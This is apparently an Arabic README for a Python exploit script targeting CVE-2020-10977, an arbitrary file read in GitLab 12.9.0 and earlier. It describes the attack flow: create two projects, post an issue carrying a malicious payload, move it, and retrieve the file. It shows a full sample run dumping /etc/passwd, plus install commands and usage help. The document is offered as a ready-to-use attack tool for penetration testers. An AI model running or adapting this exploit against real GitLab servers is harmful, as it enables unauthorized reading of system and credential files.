
GitLab 12.9.0 قراءة ملفات عشوائية
الهدف : 12.9.0 وما دون
تم الاختبار على : GitLab 12.8.1
في اختبار اختراق حديث وجدت نسخة GitLab على الهدف، ووجدت PoC على Exploit-DB لكنها تستخدم LDAP للمصادقة وكانت معطلة في هذه الحالة، لذلك أنشأت هذا السكربت بلغة بايثون والذي يمكنه المصادقة عبر واجهة الويب، ومثل الـ PoC الأصلية سيقوم بإنشاء مشروعين، وإصدار (Issue) في أحد المشاريع بحمولة خبيثة، ثم ينقل هذا الإصدار من مشروع إلى آخر ويقرأ محتويات الملف تلقائيًا.
أضفت بعض الأشياء مثل أن السكربت سيطلب مسارًا مطلقًا للملف الذي ترغب في قراءته، وبعد طباعة محتوياته سيطلب مسارًا آخر وينظف عند الخروج، سيتم حذف المشروعين تلقائيًا عند الخروج من السكربت باستخدام CTRL+C
$ python3 cve_2020_10977.py http://localhost twh p4ssw0rd
----------------------------------
--- CVE-2020-10977 ---------------
--- GitLab Arbitrary File Read ---
--- 12.9.0 & Below ---------------
----------------------------------
[>] Found By : vakzz [ https://hackerone.com/reports/827052 ]
[>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[+] Target : http://localhost
[+] Username : twh
[+] Password : p4ssw0rd
[+] Project Names : ProjectOne, ProjectTwo
[!] Trying to Login...
[+] Login Successful!
[!] Creating ProjectOne...
[+] ProjectOne Created Successfully!
[!] Creating ProjectTwo...
[+] ProjectTwo Created Successfully!
[>] Absolute Path to File : /etc/passwd
[!] Creating an Issue...
[+] Issue Created Successfully!
[!] Moving Issue...
[+] Issue Moved Successfully!
[+] File URL : http://localhost/twh/ProjectTwo/uploads/5f74b01d2b58e4a57ca55e1ac8778650/passwd
> /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
.
.
.
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
.
.
.
git:x:998:998::/var/opt/gitlab:/bin/sh
gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false
gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false
gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh
mattermost:x:994:994::/var/opt/gitlab/mattermost:/bin/sh
registry:x:993:993::/var/opt/gitlab/registry:/bin/sh
gitlab-prometheus:x:992:992::/var/opt/gitlab/prometheus:/bin/sh
gitlab-consul:x:991:991::/var/opt/gitlab/consul:/bin/sh
----------------------------------------
[>] Absolute Path to File : ^C
[-] Keyboard Interrupt
[!] Deleting ProjectOne...
[+] ProjectOne Successfully Deleted!
[!] Deleting ProjectTwo...
[+] ProjectTwo Successfully Deleted!
pip3 install requests bs4
سجّل حسابًا على GitLab المستهدف واستخدم نفس بيانات الاعتماد مع السكربت
$ python3 cve_2020_10977.py -h
usage: cve_2020_10977.py [-h] url username password
positional arguments:
url Target URL with http(s)://
username GitLab Username
password GitLab Password
optional arguments:
-h, --help show this help message and exit
vakzz لاكتشافه هذه الثغرة في GitLab
KouroshRZ لإنشائه PoC لهذا الاستغلال